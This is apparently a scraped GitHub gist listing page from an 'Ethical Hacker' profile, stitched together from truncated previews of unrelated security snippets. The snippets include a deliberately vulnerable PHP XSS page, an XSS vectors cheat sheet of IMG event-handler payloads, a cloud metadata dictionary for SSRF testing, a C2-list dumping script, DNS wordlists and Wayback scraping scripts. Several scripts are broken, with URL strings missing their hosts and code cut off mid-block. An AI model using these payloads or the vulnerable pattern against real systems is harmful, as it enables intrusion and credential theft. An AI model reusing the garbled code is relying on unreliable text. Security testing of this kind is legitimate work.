Skip to content

Instantly share code, notes, and snippets.



  • Ethical Hacker
  • internet
View GitHub Profile
View HTMLEntitiesBypass.php
<!DOCTYPE html>
<!-- Vulnerable Code-->
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
import socket
import struct
def dump_c2_list(c2_list):
for i in range(0xFFFFFF):
ip = Dword(c2_list + (i*8))
if ip == 0:
jhaddix / cloud_metadata.txt
Last active Aug 14, 2022 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
EdOverflow /
Last active Aug 8, 2022
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python --org organization -o /tmp/output
jhaddix / all.txt
Last active Aug 13, 2022
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = '*.%s/*&output=json&fl=original&collapse=urlkey' % host
url = '*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
kurobeats / xss_vectors.txt
Last active Aug 11, 2022
XSS Vectors Cheat Sheet
View xss_vectors.txt
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
cure53 /
Last active Jan 16, 2022
WordPress Flash XSS in flashmediaelement.swf
BuffaloWill / cloud_metadata.txt
Last active Aug 4, 2022
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
## AWS
# Amazon Web Services (No Header Required)
# from[ROLE NAME]